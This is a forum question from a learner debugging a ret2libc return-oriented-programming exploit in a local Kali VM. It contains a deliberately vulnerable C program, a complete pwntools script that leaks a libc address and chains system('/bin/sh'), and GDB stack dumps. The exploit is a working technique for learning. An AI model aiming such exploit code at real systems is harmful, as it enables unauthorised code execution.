# Buffer Overflow - Looking for help for an ROP issue

Tags: security, buffer-overflow

I am currently applying (learning purpose) this [tutorial](https://www.dailysecurity.fr/return_oriented_programming/) about a ROP-based buffer overflow inside my Kali VM, however I'm unable to reproduce the same behavior and get a shell.

I'm currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault.

I'm a beginner and don't feel comfortable with some points:

- Does my EIP during the SIGSEGV is correct ? It looks like to be not in vmmap ranges (0x7... instead of 0x8...).
- Moreover "Leak scanf" has a strange value interpreted as string "JHmp".
- Why there are values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh?
- In comments someone said he had an issue with scanf interpreting space 0x20, but after checking address I think I'm not concerned. Just maybe "Leak scanf" has 0x0a in the address could generate an error?

Could you help me to understand why it doesn't work?

I have attached screenshots with values of the stack, registers, etc. to help your understanding (The GDB break is located to the RET of vuln() function to follow the ROP chain with the overwriting of "saved eip").

Update 2 - It works fine now:

I have updated my libc and now it works, but I'm still interested if someone found why it didn't work before update?

```
Breakpoint 1, 0x080491b1 in vuln ()
[----------------------------------registers-----------------------------------]
EAX: 0x1 
EBX: 0x41414141 ('AAAA')
ECX: 0xf7f2d380 --> 0x20002 
EDX: 0xf7fa1000 --> 0x1ead6c 
ESI: 0x1 
EDI: 0x8049060 (<_start>:       xor    ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffe2b79c --> 0xf7dfad00 (<system>:       call   0xf7efb1ed)
EIP: 0x80491b1 (<vuln+63>:      ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491ac <vuln+58>: nop
   0x80491ad <vuln+59>: mov    ebx,DWORD PTR [ebp-0x4]
   0x80491b0 <vuln+62>: leave  
=> 0x80491b1 <vuln+63>: ret    
   0x80491b2 <main>:    push   ebp
   0x80491b3 <main+1>:  mov    ebp,esp
   0x80491b5 <main+3>:  and    esp,0xfffffff0
   0x80491b8 <main+6>:  call   0x80491ce <__x86.get_pc_thunk.ax>
[------------------------------------stack-------------------------------------]
0000| 0xffe2b79c --> 0xf7dfad00 (<system>:      call   0xf7efb1ed)
0004| 0xffe2b7a0 --> 0x804901e (<_init+30>:     pop    ebx)
0008| 0xffe2b7a4 --> 0xf7f45c42 ("/bin/sh")
0012| 0xffe2b7a8 --> 0x41414100 ('')
0016| 0xffe2b7ac --> 0xf7dd4900 (<__libc_start_main+224>:       and    al,0x80)
0020| 0xffe2b7b0 --> 0x1 
0024| 0xffe2b7b4 --> 0xffe2b854 --> 0xffe2c3c5 ("./testrop")
0028| 0xffe2b7b8 --> 0xffe2b85c --> 0xffe2c3cf ("SHELL=/bin/bash")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080491b1 in vuln ()
```

As you can see the stack is now good with the ROP chain and indeed i got a shell after.

**Update 1 - Code added:**

Vulnerable code:

```
#include <stdlib.h>
#include <stdio.h>

void vuln()
{
  char buffer[64];
  printf("Input: \n");
  scanf("%s",buffer);
}
int main(int argc, char **argv)
{
  vuln();
}
```

Expoit Code:

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *


context(arch='i386')
p = 0
b = ELF('./testrop')
libc = ELF('/lib/i386-linux-gnu/libc.so.6') # "info sharedlibrary" sous gdb pour connaître le chemin de votre libc

DEBUG = True

def wait(until):
    buf=p.recvuntil(until)
    if(DEBUG):
        print buf
    return buf

def start():
    global p, libc, b
    if p is not 0:
        p.close()
    p=gdb.debug('./testrop', '''
    break *0x080491b1
    c
    c
    ''')
    #p=process(["strace","-o","strace.out","./testrop"])
    wait("Input:")


# pwntools permet de récupérer les adresses directement dans le binaire sans avoir à les chercher via objdump :
addrmain = b.symbols['main'] 
pr = 0x0804901e  # pop ebx ; ret
gotscanf = b.symbols['got.__isoc99_scanf'] 
pltputs = b.symbols['puts']
padding="A"*76

start()
log.info("Construct ropchain")
log.info("Leak got pltputs: "+str(hex(pltputs)))
log.info("Leak gotscanf: "+str(hex(gotscanf)))
log.info("Leak main: "+str(hex(addrmain)))
log.info("Get shell")
ropchain=padding+p32(pltputs)+p32(pr)+p32(gotscanf)+p32(addrmain)
log.info("Get scanf leak")
p.sendline(ropchain)
leak=wait('Input:')
leak_scanf = u32(leak[2:6])
leak_system = leak_scanf - libc.symbols['__isoc99_scanf'] + libc.symbols['system']
leak_binsh = leak_scanf - libc.symbols['__isoc99_scanf'] +next(libc.search('/bin/sh\x00'))

log.info("Leak got scanf: "+str(hex(leak_scanf)))
log.info("Leak system: "+str(hex(leak_system)))
log.info("Leak /bin/sh: "+str(hex(leak_binsh)))
log.info("Get shell")
ropchain=padding+p32(leak_system)+p32(pr)+p32(leak_binsh)

p.sendline(ropchain)

# Interactive shell
p.interactive()
```

Exploit script started:

```
kali@kali:~/Scripts/ROP$ python exploit.py
[*] '/home/kali/Scripts/ROP/testrop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process '/usr/bin/gdbserver': pid 42163
[*] running in new terminal: ['/usr/bin/gdb', '-q', './testrop', '-x', '/tmp/pwngybPZs.gdb']
Input:
[*] Construct ropchain
[*] Leak got pltputs: 0x8049030
[*] Leak gotscanf: 0x804c014
[*] Leak main: 0x80491b2
[*] Get shell
[*] Get scanf leak
 
�_��
Input:
[*] Leak got scanf: 0xf7d45fd0
[*] Leak system: 0xf7d35d00
[*] Leak /bin/sh: 0xf7e80c42
```

GDB Breakpoint:

```
Reading symbols from ./testrop...
(No debugging symbols found in ./testrop)
Reading /lib/ld-linux.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib/ld-linux.so.2 from remote target...
Reading /lib/093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading /lib/.debug/093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading /usr/lib/debug//lib/093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading /usr/lib/debug/lib//093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading target:/usr/lib/debug/lib//093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x0 
EDX: 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xffce1000 --> 0x1 
EIP: 0xf7f06070 (mov    eax,esp)
EFLAGS: 0x200 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7f06064:  lea    esi,[esi+eiz*1+0x0]
   0xf7f0606b:  lea    esi,[esi+eiz*1+0x0]
   0xf7f0606f:  nop
=> 0xf7f06070:  mov    eax,esp
   0xf7f06072:  sub    esp,0xc
   0xf7f06075:  push   eax
   0xf7f06076:  call   0xf7f06dc0
   0xf7f0607b:  add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffce1000 --> 0x1 
0004| 0xffce1004 --> 0xffce13c5 ("./testrop")
0008| 0xffce1008 --> 0x0 
0012| 0xffce100c --> 0xffce13cf ("SHELL=/bin/bash")
0016| 0xffce1010 --> 0xffce13df ("SESSION_MANAGER=local/kali:@/tmp/.ICE-unix/819,unix/kali:/tmp/.ICE-unix/819")
0020| 0xffce1014 --> 0xffce142b ("WINDOWID=0")
0024| 0xffce1018 --> 0xffce1436 ("QT_ACCESSIBILITY=1")
0028| 0xffce101c --> 0xffce1449 ("COLORTERM=truecolor")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value                                                                                                                                                                                          
Stopped reason: SIGTRAP                                                                                                                                                                                                    
0xf7f06070 in ?? () from target:/lib/ld-linux.so.2                                                                                                                                                                         
Breakpoint 1 at 0x80491b1                                                                                                                                                                                                  
Reading /lib/i386-linux-gnu/libc.so.6 from remote target...                                                                                                                                                                
Reading /lib/i386-linux-gnu/dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...                                                                                                                             
Reading /lib/i386-linux-gnu/.debug/dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...                                                                                                                      
Reading /usr/lib/debug//lib/i386-linux-gnu/dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...                                                                                                              
Reading /usr/lib/debug/lib/i386-linux-gnu//dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...                                                                                                              
Reading target:/usr/lib/debug/lib/i386-linux-gnu//dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...                                                                                                       
[----------------------------------registers-----------------------------------]                                                                                                                                           
EAX: 0x1                                                                                                                                                                                                                   
EBX: 0x41414141 ('AAAA')                                                                                                                                                                                                   
ECX: 0xf7e68380 --> 0x20002                                                                                                                                                                                                
EDX: 0xf7edc000 --> 0x1ead6c                                                                                                                                                                                               
ESI: 0x1                                                                                                                                                                                                                   
EDI: 0x8049060 (<_start>:       xor    ebp,ebp)                                                                                                                                                                            
EBP: 0x41414141 ('AAAA')                                                                                                                                                                                                   
ESP: 0xffce0f4c --> 0x8049030 (<puts@plt>:      jmp    DWORD PTR ds:0x804c00c)                                                                                                                                             
EIP: 0x80491b1 (<vuln+63>:      ret)                                                                                                                                                                                       
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)                                                                                                                                            
[-------------------------------------code-------------------------------------]                                                                                                                                           
   0x80491ac <vuln+58>: nop                                                                                                                                                                                                
   0x80491ad <vuln+59>: mov    ebx,DWORD PTR [ebp-0x4]
   0x80491b0 <vuln+62>: leave  
=> 0x80491b1 <vuln+63>: ret    
   0x80491b2 <main>:    push   ebp
   0x80491b3 <main+1>:  mov    ebp,esp
   0x80491b5 <main+3>:  and    esp,0xfffffff0
   0x80491b8 <main+6>:  call   0x80491ce <__x86.get_pc_thunk.ax>
[------------------------------------stack-------------------------------------]
0000| 0xffce0f4c --> 0x8049030 (<puts@plt>:     jmp    DWORD PTR ds:0x804c00c)
0004| 0xffce0f50 --> 0x804901e (<_init+30>:     pop    ebx)
0008| 0xffce0f54 --> 0x804c014 --> 0xf7d45fd0 (<__isoc99_scanf>:        call   0xf7e361e9)
0012| 0xffce0f58 --> 0x80491b2 (<main>: push   ebp)
0016| 0xffce0f5c --> 0xf7d0f900 (<__libc_start_main+224>:       and    al,0x80)
0020| 0xffce0f60 --> 0x1 
0024| 0xffce0f64 --> 0xffce1004 --> 0xffce13c5 ("./testrop")
0028| 0xffce0f68 --> 0xffce100c --> 0xffce13cf ("SHELL=/bin/bash")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080491b1 in vuln ()
[----------------------------------registers-----------------------------------]
EAX: 0x1 
EBX: 0x41414141 ('AAAA')
ECX: 0xf7e68380 --> 0x20002 
EDX: 0xf7edc000 --> 0x1ead6c 
ESI: 0x1 
EDI: 0x8049060 (<_start>:       xor    ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffce0f4c --> 0xf7d35d00 (<system>:       call   0xf7e361ed)
EIP: 0x80491b1 (<vuln+63>:      ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491ac <vuln+58>: nop
   0x80491ad <vuln+59>: mov    ebx,DWORD PTR [ebp-0x4]
   0x80491b0 <vuln+62>: leave  
=> 0x80491b1 <vuln+63>: ret    
   0x80491b2 <main>:    push   ebp
   0x80491b3 <main+1>:  mov    ebp,esp
   0x80491b5 <main+3>:  and    esp,0xfffffff0
   0x80491b8 <main+6>:  call   0x80491ce <__x86.get_pc_thunk.ax>
[------------------------------------stack-------------------------------------]
0000| 0xffce0f4c --> 0xf7d35d00 (<system>:      call   0xf7e361ed)
0004| 0xffce0f50 --> 0x804901e (<_init+30>:     pop    ebx)
0008| 0xffce0f54 --> 0x8040042 
0012| 0xffce0f58 ("AAAA")
0016| 0xffce0f5c --> 0xf7d0f900 (<__libc_start_main+224>:       and    al,0x80)
0020| 0xffce0f60 --> 0x1 
0024| 0xffce0f64 --> 0xffce1004 --> 0xffce13c5 ("./testrop")
0028| 0xffce0f68 --> 0xffce100c --> 0xffce13cf ("SHELL=/bin/bash")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080491b1 in vuln ()
```

Exploit Python code:

[image: Exploit Python code]

Disassembler RET:

[image: Disassembler RET]

Protections:

[image: Protections]

SIGSEGV:

[image: SIGSEGV]